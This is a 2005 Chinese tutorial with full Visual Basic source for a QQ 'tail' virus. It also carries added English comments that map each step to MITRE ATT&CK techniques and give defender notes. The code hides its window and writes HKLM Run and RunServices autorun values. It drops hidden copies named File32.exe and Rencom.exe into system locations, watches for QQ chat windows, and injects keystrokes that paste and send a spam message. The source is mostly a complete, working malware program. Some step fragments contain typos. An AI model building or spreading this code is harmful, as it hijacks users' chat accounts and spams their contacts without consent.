初学API,Sunday的一个QQ尾巴病毒

本文介绍了用VB结合常用API编写QQ尾巴病毒程序的方法。该病毒运行时会隐藏自身、开机自启、复制到系统目录,还会监视QQ聊天窗口,发现后模拟键盘复制信息并发送。文中详细列出了用到的API及各步骤代码。


Sunday的一个QQ尾巴病毒

运行它时
1.它会使自身在桌面和任务栏上隐藏;
2.在注册表的RUN项下新建一个键值使之能开机自动运行;
3.复制自己到系统目录下,并隐藏;
4.监视桌面前台窗口,并捕捉QQ聊天窗口;
5.当发现QQ窗口时就立刻模拟键盘将一条信息复制上去并发送.
   就这么简单!它没有用到HOOK钩子截取系统消息,想了想,哈,俺用VB也能写一个,不就是几个常用的API
嘛.反正无聊,开工.......
  
首先介绍一下要用到的API吧
1.GetWindow           取得所属窗口句柄;
2.ShowWindow          窗口设置;
3.GetSystemDirectory  取得系统目录路径;
4.RegCreateKey        创建或打开注册表的项;
5.RegSetValueEx       在已打开的项下设置键值;
6.RegCloseKey         关闭注册表;
7.GetForegroundWindow 取得前台窗口句柄;
8.GetWindowText       取得前台窗口的标题;
9.Keybd_event         模拟键盘事件.

第一步:隐藏!!
API声明:  GetWindow    ShowWindow
常数:     GW_OWNER     SW_HIDE
' Step 1 fragment: hide the program's windows.
' GetWindow(..., GW_OWNER) fetches the owner window of the form and ShowWindow(..., SW_HIDE)
' hides it; the form itself is then made invisible. Per the article this removes the program
' from the desktop and the taskbar (cf. MITRE ATT&CK T1564.003, Hidden Window).
' Defender note: hiding windows does not hide the process; it still appears in process
' listings and in endpoint process-creation telemetry.
dim a as long
a=GetWindow(me.hwnd , GW_OWNER)
ShowWindow a , SW_HIDE
me.visible=false

第二步:取得系统目录路径!
API声明:  GetSystemDirectory
' Step 2 fragment: ask Windows for the system directory path.
' b is pre-filled with 19 spaces and passed as the output buffer with a size argument of 20;
' the return value of GetSystemDirectory is not used here.
dim b as string
b=space(19)
GetSystemDirectory b , 20

第三步:修改注册表!
API声明: RegCreateKey  RegSetValueEx  RegCloseKey
常数:    HKEY_LOCAL_MACHINE,REG_SZ
' Step 3 fragment: logon persistence through the machine-wide Run key
' (MITRE ATT&CK T1547.001, Registry Run Keys / Startup Folder).
' c holds the Run key path as printed in the article, d the target file name built from the
' system-directory buffer b; a REG_SZ value named "file32" is written under HKEY_LOCAL_MACHINE.
' Return codes of the three registry calls are not checked.
' Defender notes:
'   - Writing under HKEY_LOCAL_MACHINE requires administrative rights, so running users
'     without admin privileges blocks this step.
'   - Value-set events on the Run keys (e.g. Sysmon Event ID 13) and periodic autorun
'     review are the usual detection points for this behaviour.
dim c as string
dim d as string
dim e as long
c="SOFTWARE/Microsoft/Windows/CurrentVersion/Run"
d=b & "/file32.exe"
RegCreateKey HKEY_LOCAL_MACHINE , c , e
RegSetValueEx e , "file32" , 0 , REG_SZ , byval d , len(d)
RegCloseKey e

第四步:复制自己到系统目录下,并隐藏!
' Step 4 fragment: copy the running executable to the path d built in step 3 and, per the
' step heading, mark the copy hidden (cf. MITRE ATT&CK T1564.001, Hidden Files and Directories).
' f is the program's own path, assembled from App.Path and App.EXEName.
' Defender notes:
'   - An executable created in the system directory by a non-installer process is a strong
'     signal; file-creation telemetry (e.g. Sysmon Event ID 11) covers it.
'   - NOTE(review): the name "file32.exe" looks chosen to resemble a system file; treat
'     unfamiliar hidden .exe files in the system directory as suspect.
dim f as string
f=app.path & "/" & app.exename & ".exe"
filecopy f , d
setarrt d , vbhiden

第五步:监视前台窗口!
API声明: GetForegroundWindow    GetWindowText
' Step 5 fragment: poll the foreground window and read its title.
' h is a 256-space buffer that receives up to 255 characters of the title of the window
' returned by GetForegroundWindow. The match is on the first character of the title only.
' Defender note: no hook is installed, as the article stresses, so hook-based monitoring
' alone would not see this; the observable is a hidden process polling
' GetForegroundWindow/GetWindowText on a timer.
dim g as long
dim h as string
h=space(256)
g=GetForegroundWindow()
GetWindowText g , h , 255
' Check whether the foreground window is a QQ chat window; if so go to step six,
' otherwise keep monitoring.
' This code is meant to be placed in a TIMER event.
if left(h,1)="与" then
call stup six(第六步)
end if

第六步:设定剪切板内容,并模拟键盘(CTRL+V)粘贴,(ENTER OR ENTER+CTRL)发送!
API声明: Keybd_event
常数: vk_control(&h11)   vk_v(86)    keyeventf_keyup(&h2) 
' Step 6 fragment: replace the clipboard contents with a fixed message and inject keystrokes
' into whatever window has focus. Per the step heading and the constants listed above it,
' the sequence is Ctrl+V (paste), Enter, then Ctrl+Enter (the two possible send shortcuts);
' &H11 is the Control key, 86 is V and 13 is Enter. The clipboard is cleared again at the end.
' Defender notes:
'   - The user's own clipboard contents are destroyed, which is a user-visible symptom.
'   - keybd_event produces synthetic input; a low-level keyboard hook sees such events with
'     the LLKHF_INJECTED flag set, and UIPI stops injection into higher-integrity windows.
clipboard.clear
clipboard.settext "恭喜你,高中了QQ尾巴病毒!"
keybd_ecent vk_control,0,0,0
keybd_event 86,0,0,0
keybd_ecent 86,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
keybd_ecent 13,0,0,0
keybd_ecent 13,0,keyeventf_keyup,0
keybd_event vk_control,0,0,0
keybd_ecent 13,0,0,0
keybd_event 13,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
clipboard.clear

完整代码如下:
' Win32 API declarations and module-level state for the full listing.
' Taken together the imports show the program's capabilities: window hiding (user32),
' system-directory lookup (kernel32), registry writes (advapi32), foreground-window
' inspection and synthetic keyboard input (user32). This import set in a small windowless
' executable is a useful static triage indicator.

' Window hiding.
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const GW_OWNER = 4
Private Const SW_HIDE = 0
' System directory lookup (ANSI variant).
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' Registry access used for the autorun entries (ANSI variants).
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long         ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
' Foreground window handle and title (ANSI variant).
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
' Synthetic keyboard input.
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const KEYEVENTF_KEYUP = &H2
' j: title of the chat window seen by the timer; k: title of the window last messaged.
Dim j As String
Dim k As String
' ii: tick counter maintained by Timer1_Timer.
Dim ii As Integer
' e, f: set at the end of Form_Load to the two copy paths; not read elsewhere in this listing.
' Only f is declared As String here; e has no explicit type.
Dim e, f As String

Private Sub Form_Load()
' Startup routine: hides the program, registers two autorun values and drops two hidden
' copies of the executable.
'
' Host indicators visible in this routine (useful for triage and cleanup):
'   - registry values "File32" and "Rencom" under the HKEY_LOCAL_MACHINE Run and
'     RunServices key paths held in c and d
'   - files named File32.exe and Rencom.exe carrying the hidden attribute
' Behaviour maps to MITRE ATT&CK T1547.001 (Run keys), T1564.001 (hidden files) and
' T1564.003 (hidden window).
' Defender notes: both the HKEY_LOCAL_MACHINE writes and the copies into system locations
' need administrative rights, so least-privilege accounts stop this routine; registry
' value-set and file-creation telemetry cover detection. RunServices is a key honoured by
' Windows 9x-era systems.
Dim a As Long
Dim b As String
Dim c, d As String
Dim e1 As String
Dim e2 As String
Dim f1, f2 As Long
' Hide the form and its owner window.
Me.Visible = False
a = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow a, SW_HIDE
' Fetch the system directory into a 19-space buffer (size argument 20); the returned
' length is not used.
b = Space(19)
GetSystemDirectory b, 20
c = "SOFTWARE/Microsoft/Windows/CurrentVersion/Run"
d = "SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices"
' e1: path built from the whole buffer; e2: path built from its first 11 characters
' (presumably the Windows directory prefix -- TODO confirm).
e1 = b & "/File32.exe"
e2 = Left(b, 11) & "Rencom.exe"
' Register both paths as autorun values; return codes are not checked.
RegCreateKey HKEY_LOCAL_MACHINE, c, f1
RegSetValueEx f1, "File32", 0, REG_SZ, ByVal e1, Len(e1)
RegCloseKey f1
RegCreateKey HKEY_LOCAL_MACHINE, d, f2
RegSetValueEx f2, "Rencom", 0, REG_SZ, ByVal e2, Len(e2)
RegCloseKey f2
' From here on runtime errors are ignored, so a failed copy or attribute change is silent.
On Error Resume Next
Dim g As String
' g is the path of the running executable.
g = App.Path & "/" & App.EXEName & ".exe"
FileCopy g, e1
SetAttr e1, vbHidden
FileCopy g, e2
SetAttr e2, vbHidden
' Keep the two copy paths in module-level variables.
e = e1
f = e2
End Sub

Private Sub Timer1_Timer()
' Timer tick: polls the foreground window and hands off to mer when its title looks like a
' QQ chat window. The article's step 5 treats a title whose first character is "与" as a
' chat window; nothing else about the window is checked.
' Defender note: the observable here is a windowless process repeatedly calling
' GetForegroundWindow/GetWindowText; no hook is installed.

' Tick counter, wrapped back to 1 when it reaches 1111.
ii = ii + 1
If ii = 1111 Then ii = 1
Dim h As Long
Dim i As String
h = GetForegroundWindow()
' 256-space buffer receiving up to 255 characters of the window title.
i = Space(256)
GetWindowText h, i, 255
' Act only on ticks where ii Mod 20 = 8, which throttles how often a match triggers mer.
If Left(i, 1) = "与" And ii Mod 20 = 8 Then
' Remember the matched title in j for mer (the Space(256) assignment is overwritten at once).
j = Space(256)
j = i
Call mer
End If
End Sub
 Sub mer()
' Pastes a fixed message into the focused window and presses the send shortcuts, unless the
' window title j equals k, the title that was messaged last (so the same chat window is not
' messaged twice in a row).
' Key codes: &H11 is Control, 86 is V, 13 is Enter; each key is pressed and then released
' with KEYEVENTF_KEYUP.
' Defender notes:
'   - The previous clipboard contents are replaced and not restored, a user-visible symptom.
'   - keybd_event generates synthetic input; a low-level keyboard hook sees such events with
'     the LLKHF_INJECTED flag set, and UIPI stops injection into higher-integrity windows.
'   - The keystrokes go to whichever window holds focus at that moment; nothing here
'     re-checks the target after the title comparison.
If k <> j Then
Clipboard.Clear
Clipboard.SetText "恭喜你,高中了QQ尾巴病毒!"
' Ctrl+V: paste.
keybd_event &H11, 0, 0, 0
keybd_event 86, 0, 0, 0
keybd_event 86, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
' Enter: first send shortcut.
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
' Ctrl+Enter: second send shortcut.
keybd_event &H11, 0, 0, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
' Record this window title as the last one messaged.
k = Space(256)
k = j
End If
End Sub


  ---------Sunday#
  -----------2005.8.10
